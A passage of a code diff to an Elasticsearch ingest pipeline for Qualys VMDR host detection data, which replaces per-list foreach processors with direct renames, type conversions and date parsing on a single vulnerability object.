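well-defined for every host, with the single-object case still to be confirmed against real API output. The CEL program continues outside the hunk.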
@@ -780,496 +780,402 @@ processors: lang: painless tag: script_to_set_IS_DISABLED description: Script to set IS_DISABLED for 0 and 1 values. - if: ctx.json?.DETECTION_LIST?.DETECTION instanceof List + if: ctx.json?.DETECTION_LIST != null source: >- - for (def obj : ctx.json.DETECTION_LIST.DETECTION) { - if (obj.containsKey("IS_DISABLED") && obj.get("IS_DISABLED").equals('0')) { - obj.remove("IS_DISABLED"); - obj.put("IS_DISABLED", false); - } else if (obj.containsKey("IS_DISABLED") && obj.get("IS_DISABLED").equals('1')) { - obj.remove("IS_DISABLED"); - obj.put("IS_DISABLED", true); - } + def obj = ctx.json.DETECTION_LIST; + if (obj.containsKey("IS_DISABLED") && obj.get("IS_DISABLED").equals('0')) { + obj.remove("IS_DISABLED"); + obj.put("IS_DISABLED", false); + } else if (obj.containsKey("IS_DISABLED") && obj.get("IS_DISABLED").equals('1')) { + obj.remove("IS_DISABLED"); + obj.put("IS_DISABLED", true); } - script: lang: painless tag: script_to_set_IS_IGNORED description: Script to set IS_IGNORED for 0 and 1 values. 
- if: ctx.json?.DETECTION_LIST?.DETECTION instanceof List + if: ctx.json?.DETECTION_LIST != null source: >- - for (def obj : ctx.json.DETECTION_LIST.DETECTION) { - if (obj.containsKey("IS_IGNORED") && obj.get("IS_IGNORED").equals('0')) { - obj.remove("IS_IGNORED"); - obj.put("IS_IGNORED", false); - } else if (obj.containsKey("IS_IGNORED") && obj.get("IS_IGNORED").equals('1')) { - obj.remove("IS_IGNORED"); - obj.put("IS_IGNORED", true); - } + def obj = ctx.json.DETECTION_LIST; + if (obj.containsKey("IS_IGNORED") && obj.get("IS_IGNORED").equals('0')) { + obj.remove("IS_IGNORED"); + obj.put("IS_IGNORED", false); + } else if (obj.containsKey("IS_IGNORED") && obj.get("IS_IGNORED").equals('1')) { + obj.remove("IS_IGNORED"); + obj.put("IS_IGNORED", true); } - rename: - field: json.DETECTION_LIST.DETECTION - tag: rename_DETECTION_LIST_DETECTION - target_field: qualys_vmdr.asset_host_detection.list + field: json.DETECTION_LIST + tag: rename_DETECTION_LIST + target_field: qualys_vmdr.asset_host_detection.vulnerability + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.UNIQUE_VULN_ID != null + field: qualys_vmdr.asset_host_detection.vulnerability.UNIQUE_VULN_ID + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_UNIQUE_VULN_ID + target_field: qualys_vmdr.asset_host_detection.vulnerability.unique_vuln_id + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.PROTOCOL != null + field: qualys_vmdr.asset_host_detection.vulnerability.PROTOCOL + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_PROTOCOL_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.protocol + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.FQDN != null + field: qualys_vmdr.asset_host_detection.vulnerability.FQDN + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_FQDN_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.fqdn + 
ignore_missing: true + - append: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.fqdn != null + field: related.hosts + tag: append_qualys_vmdr_asset_host_detection_vulnerability_fqdn_into_related_hosts_1 + value: '{{{qualys_vmdr.asset_host_detection.vulnerability.fqdn}}}' + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.INSTANCE != null + field: qualys_vmdr.asset_host_detection.vulnerability.INSTANCE + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_INSTANCE_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.instance + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.SERVICE != null + field: qualys_vmdr.asset_host_detection.vulnerability.SERVICE + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_SERVICE_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.service + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.AFFECT_RUNNING_KERNEL != null + field: qualys_vmdr.asset_host_detection.vulnerability.AFFECT_RUNNING_KERNEL + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_AFFECT_RUNNING_KERNEL_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.affect.running.kernel + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.AFFECT_RUNNING_SERVICE != null + field: qualys_vmdr.asset_host_detection.vulnerability.AFFECT_RUNNING_SERVICE + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_AFFECT_RUNNING_SERVICE_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.affect.running.service + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.AFFECT_EXPLOITABLE_CONFIG != null + field: qualys_vmdr.asset_host_detection.vulnerability.AFFECT_EXPLOITABLE_CONFIG + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_AFFECT_EXPLOITABLE_CONFIG_1 + target_field: 
qualys_vmdr.asset_host_detection.vulnerability.affect.exploitable_config + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.ASSET_CVE != null + field: qualys_vmdr.asset_host_detection.vulnerability.ASSET_CVE + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_ASSET_CVE_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.asset_cve + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.QID != null + field: qualys_vmdr.asset_host_detection.vulnerability.QID + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_QID_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qid + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.RESULTS != null + field: qualys_vmdr.asset_host_detection.vulnerability.RESULTS + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_RESULTS_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.results + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.STATUS != null + field: qualys_vmdr.asset_host_detection.vulnerability.STATUS + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_STATUS_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.status + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.TYPE != null + field: qualys_vmdr.asset_host_detection.vulnerability.TYPE + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_TYPE_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.type + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.QDS != null + field: qualys_vmdr.asset_host_detection.vulnerability.QDS + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_QDS_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qds + ignore_missing: true + - rename: + if: 
ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null + field: qualys_vmdr.asset_host_detection.vulnerability.qds.#text + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_qds_#text_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qds.text + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.SSL != null + field: qualys_vmdr.asset_host_detection.vulnerability.SSL + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_SSL_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.ssl + ignore_missing: true + - date: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.FIRST_FOUND_DATETIME != null + field: qualys_vmdr.asset_host_detection.vulnerability.FIRST_FOUND_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_FIRST_FOUND_DATETIME_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.first.found_datetime + formats: + - ISO8601 + ignore_failure: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.FIRST_REOPENED_DATETIME != null + field: qualys_vmdr.asset_host_detection.vulnerability.FIRST_REOPENED_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_FIRST_REOPENED_DATETIME_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.first.reopened_datetime + formats: + - ISO8601 + ignore_failure: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.LAST_FOUND_DATETIME != null + field: 
qualys_vmdr.asset_host_detection.vulnerability.LAST_FOUND_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_FOUND_DATETIME_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.last.found_datetime + formats: + - ISO8601 + ignore_failure: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: qualys_vmdr.asset_host_detection.vulnerability.LAST_REOPENED_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_REOPENED_DATETIME_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.last.reopened_datetime + formats: + - ISO8601 + ignore_failure: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: qualys_vmdr.asset_host_detection.vulnerability.LAST_PROCESSED_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_PROCESSED_DATETIME_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.last.processed_datetime + formats: + - ISO8601 + ignore_failure: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.LAST_TEST_DATETIME != null + field: qualys_vmdr.asset_host_detection.vulnerability.LAST_TEST_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_TEST_DATETIME_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.last.test_datetime + formats: + - ISO8601 + 
ignore_failure: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.LAST_UPDATE_DATETIME != null + field: qualys_vmdr.asset_host_detection.vulnerability.LAST_UPDATE_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_UPDATE_DATETIME_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.last.update_datetime + formats: + - ISO8601 + ignore_failure: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.LAST_FIXED_DATETIME != null + field: qualys_vmdr.asset_host_detection.vulnerability.LAST_FIXED_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_FIXED_DATETIME_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.last.fixed_datetime + formats: + - ISO8601 + ignore_failure: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.SEVERITY != null + field: qualys_vmdr.asset_host_detection.vulnerability.SEVERITY + target_field: qualys_vmdr.asset_host_detection.vulnerability.severity + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_SEVERITY_to_long_1 + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag 
{{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.IS_IGNORED != null + field: qualys_vmdr.asset_host_detection.vulnerability.IS_IGNORED + target_field: qualys_vmdr.asset_host_detection.vulnerability.is_ignored + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_IS_IGNORED_to_boolean + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.IS_DISABLED != null + field: qualys_vmdr.asset_host_detection.vulnerability.IS_DISABLED + target_field: qualys_vmdr.asset_host_detection.vulnerability.is_disabled + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_IS_DISABLED_to_boolean + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.TIMES_FOUND != null + field: qualys_vmdr.asset_host_detection.vulnerability.TIMES_FOUND + target_field: qualys_vmdr.asset_host_detection.vulnerability.times.found + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_TIMES_FOUND_to_long_1 + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + if: 
ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.TIMES_REOPENED != null + field: qualys_vmdr.asset_host_detection.vulnerability.TIMES_REOPENED + target_field: qualys_vmdr.asset_host_detection.vulnerability.times.reopened + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_TIMES_REOPENED_to_long_1 + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.PORT != null + field: qualys_vmdr.asset_host_detection.vulnerability.PORT + target_field: qualys_vmdr.asset_host_detection.vulnerability.port + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_PORT_to_long_1 + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.QDS_FACTORS?.QDS_FACTOR != null + field: qualys_vmdr.asset_host_detection.vulnerability.QDS_FACTORS.QDS_FACTOR + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_QDS_FACTORS_QDS_FACTOR_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qds_factors ignore_missing: true - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_PROTOCOL - processor: - rename: - field: _ingest._value.PROTOCOL - tag: rename_qualys_vmdr_asset_host_detection_list_PROTOCOL_1 - target_field: _ingest._value.protocol - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List 
- tag: foreach_rename_FQDN - processor: - rename: - field: _ingest._value.FQDN - tag: rename_qualys_vmdr_asset_host_detection_list_FQDN_1 - target_field: _ingest._value.fqdn - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_FQDN - processor: - append: - field: related.hosts - tag: append_qualys_vmdr_asset_host_detection_list_fqdn_into_related_hosts_1 - value: '{{{_ingest._value.fqdn}}}' - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_INSTANCE - processor: - rename: - field: _ingest._value.INSTANCE - tag: rename_qualys_vmdr_asset_host_detection_list_INSTANCE_1 - target_field: _ingest._value.instance - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_SERVICE - processor: - rename: - field: _ingest._value.SERVICE - tag: rename_qualys_vmdr_asset_host_detection_list_SERVICE_1 - target_field: _ingest._value.service - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_AFFECT_RUNNING_KERNEL - processor: - rename: - field: _ingest._value.AFFECT_RUNNING_KERNEL - tag: rename_qualys_vmdr_asset_host_detection_list_AFFECT_RUNNING_KERNEL_1 - target_field: _ingest._value.affect.running.kernel - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_AFFECT_RUNNING_SERVICE - processor: - rename: - field: _ingest._value.AFFECT_RUNNING_SERVICE - tag: rename_qualys_vmdr_asset_host_detection_list_AFFECT_RUNNING_SERVICE_1 - target_field: _ingest._value.affect.running.service - ignore_missing: true - - foreach: - field: 
qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_AFFECT_EXPLOITABLE_CONFIG - processor: - rename: - field: _ingest._value.AFFECT_EXPLOITABLE_CONFIG - tag: rename_qualys_vmdr_asset_host_detection_list_AFFECT_EXPLOITABLE_CONFIG_1 - target_field: _ingest._value.affect.exploitable_config - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_ASSET_CVE - processor: - rename: - field: _ingest._value.ASSET_CVE - tag: rename_qualys_vmdr_asset_host_detection_list_ASSET_CVE_1 - target_field: _ingest._value.asset_cve - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_QID - processor: - rename: - field: _ingest._value.QID - tag: rename_qualys_vmdr_asset_host_detection_list_QID_1 - target_field: _ingest._value.qid - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_RESULTS - processor: - rename: - field: _ingest._value.RESULTS - tag: rename_qualys_vmdr_asset_host_detection_list_RESULTS_1 - target_field: _ingest._value.results - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_STATUS - processor: - rename: - field: _ingest._value.STATUS - tag: rename_qualys_vmdr_asset_host_detection_list_STATUS_1 - target_field: _ingest._value.status - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_TYPE - processor: - rename: - field: _ingest._value.TYPE - tag: rename_qualys_vmdr_asset_host_detection_list_TYPE_1 - target_field: 
_ingest._value.type - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_QDS - processor: - rename: - field: _ingest._value.QDS - tag: rename_qualys_vmdr_asset_host_detection_list_QDS_1 - target_field: _ingest._value.qds - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_qds_#text - processor: - rename: - field: _ingest._value.qds.#text - tag: rename_qualys_vmdr_asset_host_detection_list_qds_#text_1 - target_field: _ingest._value.qds.text - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_SSL - processor: - rename: - field: _ingest._value.SSL - tag: rename_qualys_vmdr_asset_host_detection_list_SSL_1 - target_field: _ingest._value.ssl - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_date_FIRST_FOUND_DATETIME - processor: - date: - field: _ingest._value.FIRST_FOUND_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_FIRST_FOUND_DATETIME_1 - target_field: _ingest._value.first.found_datetime - formats: - - ISO8601 - ignore_failure: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_date_FIRST_REOPENED_DATETIME - processor: - date: - field: _ingest._value.FIRST_REOPENED_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_FIRST_REOPENED_DATETIME_1 - target_field: _ingest._value.first.reopened_datetime - formats: - - ISO8601 - ignore_failure: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: 
foreach_date_LAST_FOUND_DATETIME - processor: - date: - field: _ingest._value.LAST_FOUND_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_LAST_FOUND_DATETIME_1 - target_field: _ingest._value.last.found_datetime - formats: - - ISO8601 - ignore_failure: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_date_LAST_REOPENED_DATETIME - processor: - date: - field: _ingest._value.LAST_REOPENED_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_LAST_REOPENED_DATETIME_1 - target_field: _ingest._value.last.reopened_datetime - formats: - - ISO8601 - ignore_failure: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_date_LAST_PROCESSED_DATETIME - processor: - date: - field: _ingest._value.LAST_PROCESSED_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_LAST_PROCESSED_DATETIME_1 - target_field: _ingest._value.last.processed_datetime - formats: - - ISO8601 - ignore_failure: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_date_LAST_TEST_DATETIME - processor: - date: - field: _ingest._value.LAST_TEST_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_LAST_TEST_DATETIME_1 - target_field: _ingest._value.last.test_datetime - formats: - - ISO8601 - ignore_failure: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_date_LAST_UPDATE_DATETIME - processor: - date: - field: _ingest._value.LAST_UPDATE_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_LAST_UPDATE_DATETIME_1 - target_field: _ingest._value.last.update_datetime - formats: - - ISO8601 - ignore_failure: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: 
ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_date_LAST_FIXED_DATETIME - processor: - date: - field: _ingest._value.LAST_FIXED_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_LAST_FIXED_DATETIME_1 - target_field: _ingest._value.last.fixed_datetime - formats: - - ISO8601 - ignore_failure: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_CONVERT_SEVERITY - processor: - convert: - field: _ingest._value.SEVERITY - target_field: _ingest._value.severity - tag: convert_qualys_vmdr_asset_host_detection_list_SEVERITY_to_long_1 - type: long - ignore_missing: true - on_failure: - - append: - field: error.message - value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_convert_IS_IGNORED - processor: - convert: - field: _ingest._value.IS_IGNORED - target_field: _ingest._value.is_ignored - tag: convert_qualys_vmdr_asset_host_detection_list_IS_IGNORED_to_boolean - type: boolean - ignore_missing: true - on_failure: - - append: - field: error.message - value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_convert_IS_DISABLED - processor: - convert: - field: _ingest._value.IS_DISABLED - target_field: _ingest._value.is_disabled - tag: convert_qualys_vmdr_asset_host_detection_list_IS_DISABLED_to_boolean - type: boolean - ignore_missing: true - on_failure: - - append: - field: error.message - 
value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_convert_TIMES_FOUND - processor: - convert: - field: _ingest._value.TIMES_FOUND - target_field: _ingest._value.times.found - tag: convert_qualys_vmdr_asset_host_detection_list_TIMES_FOUND_to_long_1 - type: long - ignore_missing: true - on_failure: - - append: - field: error.message - value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_convert_TIMES_REOPENED - processor: - convert: - field: _ingest._value.TIMES_REOPENED - target_field: _ingest._value.times.reopened - tag: convert_qualys_vmdr_asset_host_detection_list_TIMES_REOPENED_to_long_1 - type: long - ignore_missing: true - on_failure: - - append: - field: error.message - value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_convert_PORT - processor: - convert: - field: _ingest._value.PORT - target_field: _ingest._value.port - tag: convert_qualys_vmdr_asset_host_detection_list_PORT_to_long_1 - type: long - ignore_missing: true - on_failure: - - append: - field: error.message - value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed 
with message: {{{_ingest.on_failure_message}}}' - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_QDS_FACTOR - processor: - rename: - field: _ingest._value.QDS_FACTORS.QDS_FACTOR - tag: rename_qualys_vmdr_asset_host_detection_list_QDS_FACTORS_QDS_FACTOR_1 - target_field: _ingest._value.qds_factors - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_inside_foreach - processor: - foreach: - field: _ingest._value.qds_factors - ignore_missing: true - tag: foreach_nested - processor: - rename: - field: _ingest._value.#text - tag: rename_qualys_vmdr_asset_host_detection_list_qds_factors_#text_1 - target_field: _ingest._value.text - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_qds_factors_#text + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.qds_factors != null + field: qualys_vmdr.asset_host_detection.vulnerability.qds_factors + ignore_missing: true + tag: foreach_nested processor: rename: - field: _ingest._value.qds_factors.#text - tag: rename_qualys_vmdr_asset_host_detection_list_qds_factors_#text_2 - target_field: _ingest._value.qds_factors.text + field: _ingest._value.#text + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_qds_factors_#text_1 + target_field: _ingest._value.text ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.QDS_FACTORS.QDS_FACTOR - tag: rename_qualys_vmdr_asset_host_detection_list_QDS_FACTORS_QDS_FACTOR_2 - target_field: qualys_vmdr.asset_host_detection.list.qds_factors + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.qds_factors != null + field: qualys_vmdr.asset_host_detection.vulnerability.qds_factors.#text + tag: 
